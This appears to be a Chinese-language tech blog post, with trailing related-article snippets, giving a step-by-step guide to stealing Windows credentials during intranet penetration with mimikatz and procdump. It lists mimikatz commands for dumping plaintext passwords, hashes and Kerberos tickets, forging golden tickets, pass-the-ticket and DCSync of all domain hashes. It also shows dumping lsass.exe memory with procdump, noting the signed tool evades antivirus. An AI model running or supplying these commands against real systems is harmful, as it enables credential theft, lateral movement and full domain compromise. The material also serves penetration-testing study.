【mimikatz】内网渗透工具 下载 基本操作+【procdump】 下载 操作

最新推荐文章于 2025-03-11 13:56:03 发布
最新推荐文章于 2025-03-11 13:56:03 发布
阅读量5.2k 收藏 26
点赞数 13
分类专栏: Windows域渗透 文章标签: 经验分享 windows 测试工具 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65837674/article/details/135541478
版权
本文介绍了在Windows2012及以上版本中,由于lsass.exe的安全机制,如何使用procdump配合mimikatz获取明文密码的方法,包括提权、利用sekurlsa模块读取密码、kerberos协议和离线读取lsass.exe内存等技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

【说明】

  • procdump 下载链接及使用方法在文章最后部分 “离线读取lsass.exe”
  • mimikatz 在内网渗透中,windows 2012以上版本中就无法抓取明文密码,需要搭配 procdump.exe 一起使用
  • 下面所有模块命令均在运行 mimikatz 后自带的命令交互界面中执行

mimikatz基本介绍

  • Mimikatz 是一款法国人开发的轻量级的调试工具,通过它可以提升一个进程的权限、读取进程内存等,最大的亮点就是可以直接从 lsass.exe 进程中获取当前登录系统用户名和密码。
  • 关于 lsass.exe ,它是微软 Windows 的系统进程,也是一个安全机制,用于本地安全和登陆策略。通常我们在登录系统时输入用户名和密码之后,密码会存储在 lsass 内存中,经过里面 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中,而 mimikatz 正是通过对 lsass 逆算获取到明文密码。
  • 下载链接:https://github.com/gentilkiwi/mimikatz/

mimikatz内网渗透常用模块与命令

privilege(提权相关模块)

特别说明:privilege::debug 进入mimikatz命令交互界面的首要操作,也是最基本操作!!!

#记住第一个 privilege::debug 就够了,其他的不常用 privilege::debug//调整为调试权限。mimikatz中很多功能都需要该权限

privilege::security     //调整为安全权限 
privilege::restore      //恢复原来权限 
privilege::sysenv       //调整为系统环境权限 
privilege::driver       //调整为装载驱动权限

sekurlsa (与用户凭证相关的模块,可以从 lsass 进程中提取 passwords、keys、tickets等信息)

sekurlsa::msv      //读取用户对应密码的各种加密协议的密文(NTML、SHA1等),低版本windows可以读取为明文
sekurlsa::wdigest     //wdigest凭证,运用程序漏洞可逆的手法去读取密码明文
sekurlsa::tspkg       //tspkg凭证

sekurlsa::logonpasswords    //常用并重点使用!!!直接集成上面多条指令功能,读取用户各种凭证和信息。

sekurlsa::tickets                 //列出kerberos中的票据
sekurlsa::tickets /export         //导出票据

#下面两条命令结合使用,可以将转储的lsass进程为lsass.dmp文件,离线读取内存信息
sekurlsa::minidump <filename>或lsass.dump      //加载对应文件(lsass.dump)
sekurlsa::logonPasswords full        //读取文件信息

kerberos 协议相关模块(常用于 黄金/白银票据)

kerberos::list      //列出系统中的所有票据
kerberos::purge     //清除系统中的票据
kerberos::ptt       //pass-the-ticket,票据传递攻击(内网横移操作)
kerberos::golden    //伪造黄金和白银票据使用,具体构造方法不相同

kerberos::ptc      //票据路径
kerberos::ptc <票据名>    //导入票据

process(进程模块)

process::list      //列出进程列表
process::exports      //导出进程列表
process::start      //开始一个进程
process::stop      //停止一个进程

service(服务管理模块)

service::start         //开始服务。
service::remove        //移除服务。
service::stop         //停止服务。
service::suspend        //暂停服务。
service::resume         //恢复服务。
service::preshutdown    //关闭服务。
service::shutdown       //关闭服务。
service::list           //列出服务。

lsadump(对域控操作模块)

Lsadump::secrets       //从registry获取保存的密码凭据,可以直接获取明文密码。
lsadump::lsa /patch     //读取所有用户的哈希
lsadump::sam      //sam表获取Hash
lsadump::dcsync      //通过dcsync利用目录复制服务(DRS)从NTDS.DIT文件中拿到密码哈希值(在域控权限下获取)
lsadump::dcsync /domain:xxxx.com /user:xxxx       //查看域内指定用户信息,包括NTLM哈希等
lsadump::dcsync /domain:xxxx.com /all /csv       //查看所有域用户

离线读取 lsass.exe 的密码(模拟无法上传 mimikatz 到目标靶机的情况)

方法一:图形化界面操作

  1. 任务管理器找到 lsass.exe 进程
  2. 右键进程,可以选择创建转储文件(相当于导出程序信息),然后就可以看到新建了一个.dmp 后缀的文件。
  3. 最后用 mimikatz 读取dmp文件即可

方法二:【procdum.exe】命令行操作

procdump.exe 工具:微软官方工具,它可以转储exe进程为 dmp 文件

下载链接:https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

  1. 将 procdump.exe 上传到目标靶机,微软官方工具不会报毒
  2. 在工具目录下执行命令,导出dmp文件
  3. 将它下载到有 mimikatz 的主机上,使用mimikatz读取文件信息
procdump.exe -accepteula      #运行程序,并同意该工具的使用条款,相当于在图形化界面勾选 I agree
procdump.exe ‐ma lsass.exe lsass.dmp     #导出lsass.exe进程为lsass.dmp文件

下面使用 mimikatz 读取内存:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
mimikatz.rar
07-08
mimikatz 是一款windows平台下的神器,它具备很多功能,我认为最牛逼的是lsass.exe进程中获取windows的账号明文密码,当然他的其他功能也很强大。
mimikatz 2.2.0 版本下载
gitblog_09743的博客
10-28 1576
mimikatz 2.2.0 版本下载下载地址】mimikatz2.2.0版本下载 mimikatz 2.2.0 版本下载 项目地址: https://gitcode.com/open-source-toolkit/113e9...
揭秘最为知名的黑客工具之一:Mimikatze,黑客技术零基础入门到精通教程
资深程序员,曾自学JAVA,C#,如今从业于网安行业
03-11 923
Mimikatz 是由Benjamin Delpy开发的开源工具,功能强大,能够从Windows系统中提取明文密码、Kerberos票据、密码哈希等敏感信息。Mimikatz不仅在渗透测试中广泛应用,也是安全研究和防御的重要参考工具。
mimikatz使用
mirror97black的博客
04-11 7159
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行) lsadump::lsa ...
Mimikatz Windows、Linux基本使用
weixin_51741741的博客
12-02 9680
一款密码抓取抓取神器,除了抓取密码之外,听说还可以导出谷歌浏览器的密码,当然第二种我也不会。
神器 mimikatz - 直接抓取 Windows 明文密码
oceanark的博客
07-13 7759
昨天有朋友发了个法国佬写的神器叫 mimikatz让我们看下 神器下载地址: http://blog.gentilkiwi.com/mimikatz 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-clear
mimikatz工具
03-08
本工具可以提取存于windows电脑内存中的密码,安全无毒,最新版工具.
ProcDump 工具下载
weixin_34174105的博客
11-14 539
ProcDump 工具下载 http://technet.microsoft.com/en-us/sysinternals/dd996900 转载于:https://blog.51cto.com/jackprivate/713510
mimikatz工具包
01-25
轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! Ping : 百寞' Blog » Blog Archive » 轻量级调试器神器 – mimikatz – 直接...
mimikatz.zip
08-14
mimikatz 是一款windows平台下的工具,它具备很多强大的功能,最重要的是可以从lsass.exe进程中获取windows的账号明文密码。
工具ProcDump
03-21
proc dump工具可对当前程序和当前os的状态产生一个快照,有效的分析问题的原因
mimikatz-2.2.0-20220919.zip
01-06
mimikatz-2.2.0-20220919.zip
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
mimikatz2.1
04-01
用过早期版的人都知道它的强大,能读取Windows密码,操作简单快捷,由于2.0版对Windows10失效,So作者更新了2.1版!(还未在win10下测试....下班回去就测!)
mimikatz2.0
06-26
获取系统密码工具,法国程序员开发的轻量级调试器,可以帮助安全测试人员抓取Windows密码,压缩包密码:novirus。由于属于黑客工具,杀毒软件会报毒,使用时可以暂时关闭实时扫描,或者设置例外处理。解压后,参考命令行提示即可方便使用
ProcDump抓取dump的工具
12-30
ProcDump 是一个命令行的实用工具,其主要目的是监测应用程序如何使 CPU 达到峰值(spike)以及生成崩溃转储(crash dumps),管理员或开发人员可以利用这个工具确定造成 CPU 达到峰值的原因.至于怎么使用呢?请众看倌们点选这里看看详细的指令.
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
qq_45290991的博客
09-16 1263
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap) 很紧张很“充实”的培训,今天主要是教了怎么抓取PC的密码…… 密码抓取5法 1.1mimikatz抓取明文密码 mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里猎取windows处于active状态账号明文密码,非常强大。 在网上找了一些相关的文章自己的一点总结吧 下载地址:https://github.com/gentilkiwi/mimikatz/rele
内网渗透】mimikatz 基本使用
君行路的博客
08-14 2414
文章目录前言1. 工具简介2. 提升权限 privilege::debug3. 抓取明文密码 sekurlsa::logonpasswords4. sekurlsa模块 获取密码信息4.1 procdump + mimikatz 加载dmp文件,并导出其中的明文密码4.2 导出lsass.exe进程中所有的票据 sekurlsa::tickets /export5. lsadump模块 读取域控中域成员Hash5.1 读取所有域用户的哈希 lsadump::lsa /patch5.2 查看域内指定用户信息,
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-14 1020
ProcDump 还包括使用窗口挂起 (使用相同的窗口挂起定义,Windows任务管理器使用) 、未经处理的异常监视,并且可以根据系统性能计数器的值生成转储。3、使用PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。从lsass进程中提取passwords、keys、pin、tickets等信息。2、使用procdump 导出lsass.dmp文件。5、读取lsass.dmp文件。
windows系统mimikatz下载安装
最新发布
04-03
### 如何在Windows系统上下载和安装Mimikatz #### 下载Mimikatz 为了获取Mimikatz工具,可以从官方GitHub页面下载最新版本的发布包。具体链接如下[^3]: [https://github.com/gentilkiwi/mimikatz/releases](https://github.com/gentilkiwi/mimikatz/releases) 在此页面中,可以选择适合的操作系统架构(如x86或x64)。通常推荐下载适用于当前系统的最新稳定版压缩包。 #### 安装Mimikatz Mimikatz并不需要传统意义上的“安装”,而是通过解压即可使用。以下是操作方法: 1. **解压文件**:将从GitHub下载的压缩包解压至目标目录。例如,可以将其放置于`C:\Tools\Mimikatz`路径下。 2. **权限准备**:由于Mimikatz需要访问系统级别的资源(如LSASS进程),因此必须以管理员权限运行命令提示符(CMD)或者PowerShell。 3. **验证环境**:进入解压后的目录,在命令行输入以下内容测试是否正常工作: ```cmd mimikatz.exe ``` 如果显示帮助菜单或其他初始化信息,则说明已成功加载工具。 #### 配置与初步使用 对于初次使用者来说,可能还需要了解一些基础命令来探索其功能。比如提取登录用户的凭证信息可以通过执行以下指令完成: ```cmd privilege::debug sekurlsa::logonpasswords ``` 上述两条语句分别用于提升调试权限以及展示存储在内存中的账户数据[^1]。 需要注意的是,不同版本的Windows操作系统可能会对这些操作有所限制。例如,在较新的Windows Server 2012及以上版本里,更多情况下只会返回哈希值而非明文密码[^2]。 --- ### 注意事项 - 确保仅在合法授权的情况下部署此工具进行研究或维护活动。 - 不要随意尝试未经授权的目标设备上的任何行动以免触犯法律条款。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值